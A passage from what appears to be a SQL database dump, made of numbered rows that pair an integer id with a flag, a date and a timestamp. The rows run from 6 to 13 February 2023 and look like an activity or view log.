16:43:28'),(69275,1582,1,'2023-02-06','2023-02-06 16:43:45'),(69276,1610,1,'2023-02-06','2023-02-06 16:49:11'),(69277,4960,1,'2023-02-06','2023-02-06 18:03:23'),(69278,3691,1,'2023-02-06','2023-02-06 18:06:55'),(69279,3297,1,'2023-02-06','2023-02-06 18:21:06'),(69280,1724,1,'2023-02-06','2023-02-06 18:30:16'),(69281,4323,1,'2023-02-06','2023-02-06 18:41:48'),(69282,3691,1,'2023-02-06','2023-02-06 19:52:56'),(69283,472,1,'2023-02-06','2023-02-06 20:01:38'),(69284,3261,1,'2023-02-06','2023-02-06 20:14:18'),(69285,5271,1,'2023-02-06','2023-02-06 22:35:39'),(69286,4238,1,'2023-02-06','2023-02-06 22:57:58'),(69287,4238,1,'2023-02-06','2023-02-06 22:58:15'),(69288,4520,1,'2023-02-06','2023-02-06 23:03:31'),(69289,1612,1,'2023-02-06','2023-02-06 23:28:40'),(69290,76,1,'2023-02-06','2023-02-06 23:49:55'),(69291,4938,1,'2023-02-07','2023-02-07 00:07:00'),(69292,5271,1,'2023-02-07','2023-02-07 01:01:06'),(69293,472,1,'2023-02-07','2023-02-07 02:10:37'),(69294,80,1,'2023-02-07','2023-02-07 02:33:02'),(69295,4457,1,'2023-02-07','2023-02-07 02:37:56'),(69296,3764,1,'2023-02-07','2023-02-07 02:42:26'),(69297,3735,1,'2023-02-07','2023-02-07 03:35:41'),(69298,1614,1,'2023-02-07','2023-02-07 04:00:36'),(69299,1596,1,'2023-02-07','2023-02-07 05:52:13'),(69300,5153,1,'2023-02-07','2023-02-07 05:58:48'),(69301,5153,1,'2023-02-07','2023-02-07 05:59:29'),(69302,1594,1,'2023-02-07','2023-02-07 06:19:33'),(69303,4412,1,'2023-02-07','2023-02-07 06:29:45'),(69304,4416,1,'2023-02-07','2023-02-07 06:37:53'),(69305,1586,1,'2023-02-07','2023-02-07 06:42:39'),(69306,1728,1,'2023-02-07','2023-02-07 06:44:16'),(69307,1586,1,'2023-02-07','2023-02-07 06:47:54'),(69308,68,1,'2023-02-07','2023-02-07 06:50:42'),(69309,87,1,'2023-02-07','2023-02-07 06:51:01'),(69310,91,1,'2023-02-07','2023-02-07 06:51:36'),(69311,1608,1,'2023-02-07','2023-02-07 07:08:24'),(69312,1582,1,'2023-02-07','2023-02-07 07:43:06'),(69313,2150,1,'2023-02-07','2023-02-07 07:52:12'),(69314,1877,1,'2023-02-07','2023-02-07 07:56:33'),(69315,1598,1,'2023-02-07','2023-02-07 10:20:50'),(69316,1718,1,'2023-02-07','2023-02-07 10:28:32'),(69317,1592,1,'2023-02-07','2023-02-07 10:45:10'),(69318,80,1,'2023-02-07','2023-02-07 11:00:17'),(69319,3764,1,'2023-02-07','2023-02-07 11:14:23'),(69320,4938,1,'2023-02-07','2023-02-07 11:20:11'),(69321,4938,1,'2023-02-07','2023-02-07 11:20:59'),(69322,3030,1,'2023-02-07','2023-02-07 12:01:02'),(69323,4323,1,'2023-02-07','2023-02-07 13:34:49'),(69324,3083,1,'2023-02-07','2023-02-07 13:44:37'),(69325,4911,1,'2023-02-07','2023-02-07 14:29:23'),(69326,3430,1,'2023-02-07','2023-02-07 14:38:58'),(69327,3083,1,'2023-02-07','2023-02-07 15:10:44'),(69328,1877,1,'2023-02-07','2023-02-07 15:46:00'),(69329,3102,1,'2023-02-07','2023-02-07 15:58:09'),(69330,4776,1,'2023-02-07','2023-02-07 16:05:54'),(69331,4301,1,'2023-02-07','2023-02-07 16:14:12'),(69332,4338,1,'2023-02-07','2023-02-07 16:35:44'),(69333,1596,1,'2023-02-07','2023-02-07 16:52:45'),(69334,2617,1,'2023-02-07','2023-02-07 16:57:28'),(69335,4301,1,'2023-02-07','2023-02-07 17:19:10'),(69336,2457,1,'2023-02-07','2023-02-07 17:40:53'),(69337,1544,1,'2023-02-07','2023-02-07 17:49:30'),(69338,1610,1,'2023-02-07','2023-02-07 18:11:01'),(69339,1598,1,'2023-02-07','2023-02-07 18:32:18'),(69340,1544,1,'2023-02-07','2023-02-07 18:38:40'),(69341,1728,1,'2023-02-07','2023-02-07 18:48:36'),(69342,1588,1,'2023-02-07','2023-02-07 18:58:14'),(69343,4338,1,'2023-02-07','2023-02-07 19:16:49'),(69344,1594,1,'2023-02-07','2023-02-07 20:47:14'),(69345,4802,1,'2023-02-07','2023-02-07 21:20:51'),(69346,4963,1,'2023-02-07','2023-02-07 22:11:42'),(69347,484,1,'2023-02-07','2023-02-07 22:27:59'),(69348,4977,1,'2023-02-07','2023-02-07 23:07:06'),(69349,5163,1,'2023-02-07','2023-02-07 23:21:34'),(69350,87,1,'2023-02-07','2023-02-07 23:22:49'),(69351,5163,1,'2023-02-07','2023-02-07 23:23:37'),(69352,4963,1,'2023-02-08','2023-02-08 00:12:27'),(69353,3092,1,'2023-02-08','2023-02-08 00:37:28'),(69354,1602,1,'2023-02-08','2023-02-08 01:41:12'),(69355,5271,1,'2023-02-08','2023-02-08 02:01:05'),(69356,1544,1,'2023-02-08','2023-02-08 02:54:55'),(69357,4612,1,'2023-02-08','2023-02-08 03:43:00'),(69358,4651,1,'2023-02-08','2023-02-08 04:00:12'),(69359,1600,1,'2023-02-08','2023-02-08 04:05:41'),(69360,5256,1,'2023-02-08','2023-02-08 04:57:37'),(69361,5268,1,'2023-02-08','2023-02-08 04:59:17'),(69362,4657,1,'2023-02-08','2023-02-08 05:30:10'),(69363,4301,1,'2023-02-08','2023-02-08 05:35:18'),(69364,4238,1,'2023-02-08','2023-02-08 05:57:36'),(69365,4335,1,'2023-02-08','2023-02-08 05:58:18'),(69366,4457,1,'2023-02-08','2023-02-08 07:08:10'),(69367,4301,1,'2023-02-08','2023-02-08 07:28:44'),(69368,4660,1,'2023-02-08','2023-02-08 09:36:33'),(69369,4457,1,'2023-02-08','2023-02-08 10:30:36'),(69370,91,1,'2023-02-08','2023-02-08 10:55:07'),(69371,4960,1,'2023-02-08','2023-02-08 11:14:19'),(69372,1544,1,'2023-02-08','2023-02-08 11:26:16'),(69373,2148,1,'2023-02-08','2023-02-08 12:13:11'),(69374,3109,1,'2023-02-08','2023-02-08 12:16:25'),(69375,1614,1,'2023-02-08','2023-02-08 12:38:07'),(69376,3226,1,'2023-02-08','2023-02-08 13:40:54'),(69377,4960,1,'2023-02-08','2023-02-08 14:19:56'),(69378,4960,1,'2023-02-08','2023-02-08 14:49:14'),(69379,80,1,'2023-02-08','2023-02-08 14:49:19'),(69380,4960,1,'2023-02-08','2023-02-08 14:49:29'),(69381,4960,1,'2023-02-08','2023-02-08 14:50:14'),(69382,4960,1,'2023-02-08','2023-02-08 15:51:17'),(69383,80,1,'2023-02-08','2023-02-08 15:52:33'),(69384,4520,1,'2023-02-08','2023-02-08 15:59:17'),(69385,3664,1,'2023-02-08','2023-02-08 16:00:12'),(69386,4960,1,'2023-02-08','2023-02-08 16:54:46'),(69387,2309,1,'2023-02-08','2023-02-08 17:01:03'),(69388,2309,1,'2023-02-08','2023-02-08 17:04:43'),(69389,2297,1,'2023-02-08','2023-02-08 18:34:00'),(69390,1877,1,'2023-02-08','2023-02-08 19:06:41'),(69391,4966,1,'2023-02-08','2023-02-08 20:02:11'),(69392,4651,1,'2023-02-08','2023-02-08 20:09:24'),(69393,1594,1,'2023-02-08','2023-02-08 20:11:02'),(69394,4645,1,'2023-02-08','2023-02-08 20:16:29'),(69395,4657,1,'2023-02-08','2023-02-08 20:17:19'),(69396,4238,1,'2023-02-08','2023-02-08 20:28:46'),(69397,80,1,'2023-02-08','2023-02-08 20:33:48'),(69398,3664,1,'2023-02-08','2023-02-08 20:33:59'),(69399,4660,1,'2023-02-08','2023-02-08 21:06:35'),(69400,4654,1,'2023-02-08','2023-02-08 21:17:58'),(69401,4648,1,'2023-02-08','2023-02-08 21:31:17'),(69402,1610,1,'2023-02-08','2023-02-08 22:04:01'),(69403,4663,1,'2023-02-08','2023-02-08 22:06:13'),(69404,3079,1,'2023-02-08','2023-02-08 22:10:26'),(69405,1592,1,'2023-02-08','2023-02-08 22:54:14'),(69406,5071,1,'2023-02-08','2023-02-08 22:57:07'),(69407,474,1,'2023-02-08','2023-02-08 23:21:44'),(69408,3752,1,'2023-02-08','2023-02-08 23:24:49'),(69409,3664,1,'2023-02-08','2023-02-08 23:33:59'),(69410,3777,1,'2023-02-08','2023-02-08 23:58:46'),(69411,4753,1,'2023-02-09','2023-02-09 00:17:07'),(69412,1728,1,'2023-02-09','2023-02-09 00:43:17'),(69413,4648,1,'2023-02-09','2023-02-09 01:30:52'),(69414,1602,1,'2023-02-09','2023-02-09 01:54:46'),(69415,1588,1,'2023-02-09','2023-02-09 02:25:42'),(69416,4404,1,'2023-02-09','2023-02-09 02:40:13'),(69417,80,1,'2023-02-09','2023-02-09 04:06:18'),(69418,1582,1,'2023-02-09','2023-02-09 04:12:11'),(69419,4709,1,'2023-02-09','2023-02-09 04:13:59'),(69420,3060,1,'2023-02-09','2023-02-09 04:31:07'),(69421,4645,1,'2023-02-09','2023-02-09 05:30:50'),(69422,2964,1,'2023-02-09','2023-02-09 05:46:20'),(69423,80,1,'2023-02-09','2023-02-09 06:21:52'),(69424,4870,1,'2023-02-09','2023-02-09 06:56:23'),(69425,3066,1,'2023-02-09','2023-02-09 06:56:25'),(69426,4496,1,'2023-02-09','2023-02-09 06:56:28'),(69427,4556,1,'2023-02-09','2023-02-09 06:56:28'),(69428,4703,1,'2023-02-09','2023-02-09 06:56:31'),(69429,2617,1,'2023-02-09','2023-02-09 06:56:32'),(69430,3731,1,'2023-02-09','2023-02-09 06:56:33'),(69431,102,1,'2023-02-09','2023-02-09 06:56:33'),(69432,3249,1,'2023-02-09','2023-02-09 06:56:38'),(69433,4677,1,'2023-02-09','2023-02-09 06:56:38'),(69434,4827,1,'2023-02-09','2023-02-09 06:56:38'),(69435,4335,1,'2023-02-09','2023-02-09 06:56:38'),(69436,4546,1,'2023-02-09','2023-02-09 06:56:38'),(69437,3069,1,'2023-02-09','2023-02-09 06:56:43'),(69438,3777,1,'2023-02-09','2023-02-09 06:56:43'),(69439,108,1,'2023-02-09','2023-02-09 06:57:36'),(69440,74,1,'2023-02-09','2023-02-09 06:57:37'),(69441,4858,1,'2023-02-09','2023-02-09 06:57:37'),(69442,1705,1,'2023-02-09','2023-02-09 06:57:38'),(69443,1709,1,'2023-02-09','2023-02-09 06:58:15'),(69444,4694,1,'2023-02-09','2023-02-09 06:58:15'),(69445,4930,1,'2023-02-09','2023-02-09 06:58:16'),(69446,3479,1,'2023-02-09','2023-02-09 06:58:16'),(69447,3290,1,'2023-02-09','2023-02-09 07:16:31'),(69448,68,1,'2023-02-09','2023-02-09 09:54:52'),(69449,5163,1,'2023-02-09','2023-02-09 11:29:53'),(69450,4457,1,'2023-02-09','2023-02-09 11:42:51'),(69451,5276,1,'2023-02-09','2023-02-09 11:44:19'),(69452,5276,1,'2023-02-09','2023-02-09 11:47:42'),(69453,2148,1,'2023-02-09','2023-02-09 11:49:45'),(69454,3261,1,'2023-02-09','2023-02-09 12:03:38'),(69455,4663,1,'2023-02-09','2023-02-09 12:17:30'),(69456,4747,1,'2023-02-09','2023-02-09 12:27:49'),(69457,4436,1,'2023-02-09','2023-02-09 13:08:38'),(69458,3102,1,'2023-02-09','2023-02-09 13:30:02'),(69459,5163,1,'2023-02-09','2023-02-09 13:44:01'),(69460,80,1,'2023-02-09','2023-02-09 13:44:36'),(69461,80,1,'2023-02-09','2023-02-09 13:46:24'),(69462,76,1,'2023-02-09','2023-02-09 13:46:32'),(69463,80,1,'2023-02-09','2023-02-09 13:46:35'),(69464,5163,1,'2023-02-09','2023-02-09 13:46:37'),(69465,1608,1,'2023-02-09','2023-02-09 13:51:37'),(69466,1711,1,'2023-02-09','2023-02-09 14:03:08'),(69467,4911,1,'2023-02-09','2023-02-09 14:13:43'),(69468,1728,1,'2023-02-09','2023-02-09 14:17:43'),(69469,3034,1,'2023-02-09','2023-02-09 14:35:35'),(69470,80,1,'2023-02-09','2023-02-09 14:36:04'),(69471,3034,1,'2023-02-09','2023-02-09 14:41:30'),(69472,1612,1,'2023-02-09','2023-02-09 14:45:09'),(69473,80,1,'2023-02-09','2023-02-09 14:45:25'),(69474,1612,1,'2023-02-09','2023-02-09 14:45:52'),(69475,1766,1,'2023-02-09','2023-02-09 14:55:43'),(69476,2148,1,'2023-02-09','2023-02-09 15:06:51'),(69477,89,1,'2023-02-09','2023-02-09 15:13:57'),(69478,87,1,'2023-02-09','2023-02-09 15:15:55'),(69479,76,1,'2023-02-09','2023-02-09 15:18:27'),(69480,84,1,'2023-02-09','2023-02-09 15:21:20'),(69481,3313,1,'2023-02-09','2023-02-09 15:30:47'),(69482,3079,1,'2023-02-09','2023-02-09 15:35:23'),(69483,5062,1,'2023-02-09','2023-02-09 15:43:48'),(69484,4980,1,'2023-02-09','2023-02-09 15:52:09'),(69485,2148,1,'2023-02-09','2023-02-09 16:02:09'),(69486,3486,1,'2023-02-09','2023-02-09 16:07:40'),(69487,1596,1,'2023-02-09','2023-02-09 16:25:54'),(69488,1728,1,'2023-02-09','2023-02-09 16:33:53'),(69489,1728,1,'2023-02-09','2023-02-09 16:34:12'),(69490,72,1,'2023-02-09','2023-02-09 16:53:29'),(69491,2503,1,'2023-02-09','2023-02-09 16:54:04'),(69492,84,1,'2023-02-09','2023-02-09 16:54:45'),(69493,5276,1,'2023-02-09','2023-02-09 17:04:20'),(69494,4457,1,'2023-02-09','2023-02-09 17:33:50'),(69495,1598,1,'2023-02-09','2023-02-09 17:48:09'),(69496,3083,1,'2023-02-09','2023-02-09 17:58:47'),(69497,3083,1,'2023-02-09','2023-02-09 17:59:02'),(69498,4944,1,'2023-02-09','2023-02-09 18:09:24'),(69499,3092,1,'2023-02-09','2023-02-09 18:17:00'),(69500,4960,1,'2023-02-09','2023-02-09 18:45:51'),(69501,2148,1,'2023-02-09','2023-02-09 18:56:55'),(69502,5276,1,'2023-02-09','2023-02-09 19:47:04'),(69503,3781,1,'2023-02-09','2023-02-09 20:17:09'),(69504,91,1,'2023-02-09','2023-02-09 20:50:59'),(69505,4412,1,'2023-02-09','2023-02-09 21:02:15'),(69506,3006,1,'2023-02-09','2023-02-09 21:13:38'),(69507,4448,1,'2023-02-09','2023-02-09 21:15:32'),(69508,4741,1,'2023-02-09','2023-02-09 21:47:43'),(69509,4944,1,'2023-02-09','2023-02-09 21:53:35'),(69510,4963,1,'2023-02-09','2023-02-09 21:53:43'),(69511,5276,1,'2023-02-09','2023-02-09 22:21:56'),(69512,87,1,'2023-02-10','2023-02-10 00:29:53'),(69513,5271,1,'2023-02-10','2023-02-10 00:31:30'),(69514,1703,1,'2023-02-10','2023-02-10 01:32:20'),(69515,4706,1,'2023-02-10','2023-02-10 01:47:36'),(69516,3069,1,'2023-02-10','2023-02-10 02:02:55'),(69517,3724,1,'2023-02-10','2023-02-10 02:03:16'),(69518,2252,1,'2023-02-10','2023-02-10 02:08:20'),(69519,2165,1,'2023-02-10','2023-02-10 02:24:22'),(69520,4357,1,'2023-02-10','2023-02-10 02:28:39'),(69521,1586,1,'2023-02-10','2023-02-10 03:05:12'),(69522,2964,1,'2023-02-10','2023-02-10 03:42:20'),(69523,4694,1,'2023-02-10','2023-02-10 05:42:34'),(69524,5125,1,'2023-02-10','2023-02-10 06:56:15'),(69525,4911,1,'2023-02-10','2023-02-10 07:07:54'),(69526,2148,1,'2023-02-10','2023-02-10 07:52:23'),(69527,2148,1,'2023-02-10','2023-02-10 07:52:29'),(69528,2165,1,'2023-02-10','2023-02-10 07:52:55'),(69529,2252,1,'2023-02-10','2023-02-10 08:13:54'),(69530,2297,1,'2023-02-10','2023-02-10 08:34:46'),(69531,5268,1,'2023-02-10','2023-02-10 09:49:47'),(69532,68,1,'2023-02-10','2023-02-10 09:56:04'),(69533,68,1,'2023-02-10','2023-02-10 09:59:23'),(69534,1594,1,'2023-02-10','2023-02-10 09:59:41'),(69535,76,1,'2023-02-10','2023-02-10 09:59:47'),(69536,84,1,'2023-02-10','2023-02-10 10:00:00'),(69537,1594,1,'2023-02-10','2023-02-10 10:01:10'),(69538,1608,1,'2023-02-10','2023-02-10 10:14:57'),(69539,2813,1,'2023-02-10','2023-02-10 10:40:58'),(69540,4960,1,'2023-02-10','2023-02-10 10:54:24'),(69541,4960,1,'2023-02-10','2023-02-10 11:13:04'),(69542,3006,1,'2023-02-10','2023-02-10 11:13:11'),(69543,3781,1,'2023-02-10','2023-02-10 11:32:35'),(69544,5271,1,'2023-02-10','2023-02-10 11:47:30'),(69545,5271,1,'2023-02-10','2023-02-10 11:51:38'),(69546,5271,1,'2023-02-10','2023-02-10 12:05:32'),(69547,5271,1,'2023-02-10','2023-02-10 12:05:53'),(69548,5024,1,'2023-02-10','2023-02-10 12:09:46'),(69549,4960,1,'2023-02-10','2023-02-10 12:10:21'),(69550,3004,1,'2023-02-10','2023-02-10 12:17:31'),(69551,3004,1,'2023-02-10','2023-02-10 12:17:33'),(69552,4960,1,'2023-02-10','2023-02-10 12:43:14'),(69553,4657,1,'2023-02-10','2023-02-10 12:48:08'),(69554,1743,1,'2023-02-10','2023-02-10 12:50:16'),(69555,1586,1,'2023-02-10','2023-02-10 13:02:14'),(69556,1586,1,'2023-02-10','2023-02-10 13:23:39'),(69557,2148,1,'2023-02-10','2023-02-10 13:32:15'),(69558,4703,1,'2023-02-10','2023-02-10 13:50:20'),(69559,84,1,'2023-02-10','2023-02-10 13:50:42'),(69560,108,1,'2023-02-10','2023-02-10 13:51:31'),(69561,76,1,'2023-02-10','2023-02-10 13:53:39'),(69562,5163,1,'2023-02-10','2023-02-10 14:01:51'),(69563,4963,1,'2023-02-10','2023-02-10 14:27:56'),(69564,68,1,'2023-02-10','2023-02-10 14:30:04'),(69565,91,1,'2023-02-10','2023-02-10 14:31:35'),(69566,91,1,'2023-02-10','2023-02-10 15:04:17'),(69567,5264,1,'2023-02-10','2023-02-10 15:07:15'),(69568,5264,1,'2023-02-10','2023-02-10 15:07:16'),(69569,91,1,'2023-02-10','2023-02-10 15:07:50'),(69570,5259,1,'2023-02-10','2023-02-10 15:08:26'),(69571,5259,1,'2023-02-10','2023-02-10 15:08:27'),(69572,91,1,'2023-02-10','2023-02-10 15:08:51'),(69573,5248,1,'2023-02-10','2023-02-10 15:09:04'),(69574,5248,1,'2023-02-10','2023-02-10 15:09:06'),(69575,91,1,'2023-02-10','2023-02-10 15:09:30'),(69576,4412,1,'2023-02-10','2023-02-10 15:12:38'),(69577,91,1,'2023-02-10','2023-02-10 15:13:00'),(69578,91,1,'2023-02-10','2023-02-10 15:13:24'),(69579,5163,1,'2023-02-10','2023-02-10 15:31:32'),(69580,5140,1,'2023-02-10','2023-02-10 16:08:35'),(69581,1544,1,'2023-02-10','2023-02-10 16:40:24'),(69582,4457,1,'2023-02-10','2023-02-10 16:47:37'),(69583,2809,1,'2023-02-10','2023-02-10 17:08:39'),(69584,1711,1,'2023-02-10','2023-02-10 17:17:16'),(69585,5271,1,'2023-02-10','2023-02-10 17:47:59'),(69586,2804,1,'2023-02-10','2023-02-10 17:50:21'),(69587,2804,1,'2023-02-10','2023-02-10 17:52:56'),(69588,4436,1,'2023-02-10','2023-02-10 18:10:32'),(69589,91,1,'2023-02-10','2023-02-10 18:12:40'),(69590,91,1,'2023-02-10','2023-02-10 18:18:00'),(69591,2809,1,'2023-02-10','2023-02-10 18:38:21'),(69592,91,1,'2023-02-10','2023-02-10 19:54:55'),(69593,4448,1,'2023-02-10','2023-02-10 20:28:21'),(69594,4911,1,'2023-02-10','2023-02-10 20:40:17'),(69595,1608,1,'2023-02-10','2023-02-10 20:47:27'),(69596,2769,1,'2023-02-10','2023-02-10 21:46:29'),(69597,570,1,'2023-02-10','2023-02-10 22:04:55'),(69598,4668,1,'2023-02-10','2023-02-10 22:04:57'),(69599,3664,1,'2023-02-10','2023-02-10 22:04:59'),(69600,2165,1,'2023-02-10','2023-02-10 22:28:28'),(69601,4966,1,'2023-02-10','2023-02-10 22:55:54'),(69602,4966,1,'2023-02-10','2023-02-10 22:56:20'),(69603,473,1,'2023-02-10','2023-02-10 23:24:56'),(69604,4747,1,'2023-02-11','2023-02-11 00:21:20'),(69605,4960,1,'2023-02-11','2023-02-11 00:24:11'),(69606,3790,1,'2023-02-11','2023-02-11 00:44:25'),(69607,4420,1,'2023-02-11','2023-02-11 01:32:02'),(69608,1582,1,'2023-02-11','2023-02-11 04:25:41'),(69609,2165,1,'2023-02-11','2023-02-11 05:17:45'),(69610,2769,1,'2023-02-11','2023-02-11 05:42:47'),(69611,1544,1,'2023-02-11','2023-02-11 05:54:25'),(69612,2252,1,'2023-02-11','2023-02-11 06:51:21'),(69613,1709,1,'2023-02-11','2023-02-11 07:04:13'),(69614,2904,1,'2023-02-11','2023-02-11 07:50:51'),(69615,2904,1,'2023-02-11','2023-02-11 07:52:00'),(69616,2904,1,'2023-02-11','2023-02-11 07:52:05'),(69617,1584,1,'2023-02-11','2023-02-11 09:20:28'),(69618,68,1,'2023-02-11','2023-02-11 09:21:03'),(69619,1544,1,'2023-02-11','2023-02-11 10:09:22'),(69620,2457,1,'2023-02-11','2023-02-11 10:15:15'),(69621,2904,1,'2023-02-11','2023-02-11 11:15:13'),(69622,4674,1,'2023-02-11','2023-02-11 12:04:22'),(69623,4944,1,'2023-02-11','2023-02-11 12:18:05'),(69624,4944,1,'2023-02-11','2023-02-11 12:18:39'),(69625,3791,1,'2023-02-11','2023-02-11 12:19:25'),(69626,3764,1,'2023-02-11','2023-02-11 14:04:50'),(69627,1582,1,'2023-02-11','2023-02-11 15:00:53'),(69628,3489,1,'2023-02-11','2023-02-11 16:04:44'),(69629,5140,1,'2023-02-11','2023-02-11 16:47:18'),(69630,335,1,'2023-02-11','2023-02-11 16:56:38'),(69631,4301,1,'2023-02-11','2023-02-11 17:49:39'),(69632,4654,1,'2023-02-11','2023-02-11 18:10:54'),(69633,4420,1,'2023-02-11','2023-02-11 18:20:23'),(69634,5256,1,'2023-02-11','2023-02-11 18:22:09'),(69635,4785,1,'2023-02-11','2023-02-11 18:28:47'),(69636,2989,1,'2023-02-11','2023-02-11 19:02:12'),(69637,2248,1,'2023-02-11','2023-02-11 19:19:32'),(69638,4420,1,'2023-02-11','2023-02-11 19:43:59'),(69639,3706,1,'2023-02-11','2023-02-11 19:48:29'),(69640,5256,1,'2023-02-11','2023-02-11 19:52:04'),(69641,4457,1,'2023-02-11','2023-02-11 21:09:03'),(69642,4542,1,'2023-02-11','2023-02-11 22:24:04'),(69643,5062,1,'2023-02-11','2023-02-11 23:33:11'),(69644,4950,1,'2023-02-12','2023-02-12 00:08:29'),(69645,5058,1,'2023-02-12','2023-02-12 00:44:01'),(69646,5157,1,'2023-02-12','2023-02-12 02:03:01'),(69647,4674,1,'2023-02-12','2023-02-12 05:02:57'),(69648,5271,1,'2023-02-12','2023-02-12 06:00:13'),(69649,3498,1,'2023-02-12','2023-02-12 06:00:13'),(69650,3482,1,'2023-02-12','2023-02-12 06:00:15'),(69651,3742,1,'2023-02-12','2023-02-12 06:00:16'),(69652,2165,1,'2023-02-12','2023-02-12 06:17:50'),(69653,2813,1,'2023-02-12','2023-02-12 06:41:12'),(69654,1594,1,'2023-02-12','2023-02-12 13:34:15'),(69655,469,1,'2023-02-12','2023-02-12 14:32:02'),(69656,84,1,'2023-02-12','2023-02-12 15:06:42'),(69657,68,1,'2023-02-12','2023-02-12 15:09:46'),(69658,84,1,'2023-02-12','2023-02-12 15:12:34'),(69659,5163,1,'2023-02-12','2023-02-12 15:13:13'),(69660,4412,1,'2023-02-12','2023-02-12 16:03:19'),(69661,1588,1,'2023-02-12','2023-02-12 16:04:08'),(69662,1588,1,'2023-02-12','2023-02-12 16:38:42'),(69663,1737,1,'2023-02-12','2023-02-12 16:42:23'),(69664,76,1,'2023-02-12','2023-02-12 16:46:28'),(69665,3004,1,'2023-02-12','2023-02-12 17:48:36'),(69666,3004,1,'2023-02-12','2023-02-12 17:50:06'),(69667,80,1,'2023-02-12','2023-02-12 18:31:37'),(69668,3764,1,'2023-02-12','2023-02-12 19:25:31'),(69669,2410,1,'2023-02-12','2023-02-12 19:41:35'),(69670,2411,1,'2023-02-12','2023-02-12 19:42:19'),(69671,2410,1,'2023-02-12','2023-02-12 19:42:25'),(69672,4776,1,'2023-02-12','2023-02-12 19:51:21'),(69673,3030,1,'2023-02-12','2023-02-12 20:26:04'),(69674,4404,1,'2023-02-12','2023-02-12 22:00:42'),(69675,1596,1,'2023-02-12','2023-02-12 22:00:44'),(69676,4911,1,'2023-02-12','2023-02-12 22:33:52'),(69677,470,1,'2023-02-12','2023-02-12 23:29:12'),(69678,1598,1,'2023-02-12','2023-02-12 23:57:12'),(69679,1588,1,'2023-02-13','2023-02-13 00:23:35'),(69680,2410,1,'2023-02-13','2023-02-13 00:50:39'),(69681,4335,1,'2023-02-13','2023-02-13 01:45:23'),(69682,80,1,'2023-02-13','2023-02-13 02:03:44'),(69683,91,1,'2023-02-13','2023-02-13 02:04:18'),(69684,5153,1,'2023-02-13','2023-02-13 02:04:41'),(69685,5146,1,'2023-02-13','2023-02-13 02:04:43'),(69686,80,1,'2023-02-13','2023-02-13 02:13:13'),(69687,4457,1,'2023-02-13','2023-02-13 02:19:51'),(69688,1596,1,'2023-02-13','2023-02-13 02:24:15'),(69689,468,1,'2023-02-13','2023-02-13 02:25:03'),(69690,467,1,'2023-02-13','2023-02-13 02:25:11'),(69691,4930,1,'2023-02-13','2023-02-13 02:25:32'),(69692,68,1,'2023-02-13','2023-02-13 02:26:06'),(69693,76,1,'2023-02-13','2023-02-13 02:26:27'),(69694,80,1,'2023-02-13','2023-02-13 02:27:04'),(69695,5268,1,'2023-02-13','2023-02-13 03:26:59'),(69696,5271,1,'2023-02-13','2023-02-13 03:27:01'),(69697,5268,1,'2023-02-13','2023-02-13 03:27:55'),(69698,1877,1,'2023-02-13','2023-02-13 03:32:08'),(69699,1614,1,'2023-02-13','2023-02-13 04:18:40'),(69700,1544,1,'2023-02-13','2023-02-13 05:28:12'),(69701,4960,1,'2023-02-13','2023-02-13 07:03:37'),(69702,91,1,'2023-02-13','2023-02-13 08:29:19'),(69703,68,1,'2023-02-13','2023-02-13 08:34:13'),(69704,108,1,'2023-02-13','2023-02-13 08:34:43'),(69705,1604,1,'2023-02-13','2023-02-13 08:48:15'),(69706,3102,1,'2023-02-13','2023-02-13 09:07:15'),(69707,1596,1,'2023-02-13','2023-02-13 09:14:02'),(69708,1596,1,'2023-02-13','2023-02-13 09:14:21'),(69709,2617,1,'2023-02-13','2023-02-13 09:33:14'),(69710,91,1,'2023-02-13','2023-02-13 09:37:16'),(69711,5146,1,'2023-02-13','2023-02-13 09:50:02'),(69712,5153,1,'2023-02-13','2023-02-13 09:50:08'),(69713,5259,1,'2023-02-13','2023-02-13 09:50:10'),(69714,5157,1,'2023-02-13','2023-02-13 09:50:15'),(69715,5140,1,'2023-02-13','2023-02-13 09:50:21'),(69716,5071,1,'2023-02-13','2023-02-13 09:50:38'),(69717,5054,1,'2023-02-13','2023-02-13 09:50:54'),(69718,5046,1,'2023-02-13','2023-02-13 09:51:03'),(69719,5062,1,'2023-02-13','2023-02-13 09:51:12'),(69720,5259,1,'2023-02-13','2023-02-13 09:58:31'),(69721,5071,1,'2023-02-13','2023-02-13 10:03:02'),(69722,4301,1,'2023-02-13','2023-02-13 10:33:04'),(69723,2309,1,'2023-02-13','2023-02-13 10:42:34'),(69724,470,1,'2023-02-13','2023-02-13 10:47:04'),(69725,1745,1,'2023-02-13','2023-02-13 10:53:04'),(69726,4911,1,'2023-02-13','2023-02-13 11:00:05'),(69727,4520,1,'2023-02-13','2023-02-13 11:15:27'),(69728,1724,1,'2023-02-13','2023-02-13 11:38:06'),(69729,4323,1,'2023-02-13','2023-02-13 11:41:28'),(69730,4703,1,'2023-02-13','2023-02-13 11:50:57'),(69731,1594,1,'2023-02-13','2023-02-13 12:03:04'),(69732,1594,1,'2023-02-13','2023-02-13 12:48:12'),(69733,5153,1,'2023-02-13','2023-02-13 12:57:32'),(69734,5163,1,'2023-02-13','2023-02-13 13:08:17'),(69735,1594,1,'2023-02-13','2023-02-13 13:22:33'),(69736,570,1,'2023-02-13','2023-02-13 13:36:55'),(69737,3764,1,'2023-02-13','2023-02-13 13:46:59'),(69738,4768,1,'2023-02-13','2023-02-13 14:07:26'),(69739,4960,1,'2023-02-13','2023-02-13 14:32:12'),(69740,1588,1,'2023-02-13','2023-02-13 14:49:01'),(69741,91,1,'2023-02-13','2023-02-13 15:32:55'),(69742,1722,1,'2023-02-13','2023-02-13 15:51:57'),(69743,91,1,'2023-02-13','2023-02-13 16:04:13'),(69744,4404,1,'2023-02-13','2023-02-13 17:08:27'),(69745,1608,1,'2023-02-13','2023-02-13 17:42:03'),(69746,4420,1,'2023-02-13','2023-02-13 18:01:04'),(69747,1722,1,'2023-02-13','2023-02-13 18:19:55'),(69748,3107,1,'2023-02-13','2023-02-13 18:54:48'),(69749,1610,1,'2023-02-13','2023-02-13 19:55:16'),(69750,1604,1,'2023-02-13','2023-02-13 20:37:01'),(69751,5163,1,'2023-02-13','2023-02-13 21:10:39'),(69752,1614,1,'2023-02-13','2023-02-13 21:12:36'),(69753,5163,1,'2023-02-13','2023-02-13 21:14:15'),(69754,5163,1,'2023-02-13','2023-02-13 21:18:13'),(69755,5163,1,'2023-02-13','2023-02-13 21:18:24'),(69756,5163,1,'2023-02-13','2023-02-13 21:19:59'),(69757,5153,1,'2023-02-13','2023-02-13 22:19:29'),(69758,5163,1,'2023-02-13','2023-02-13 22:21:57'),(69759,3764,1,'2023-02-13','2023-02-13 22:29:46'),(69760,74,1,'2023-02-13','2023-02-13 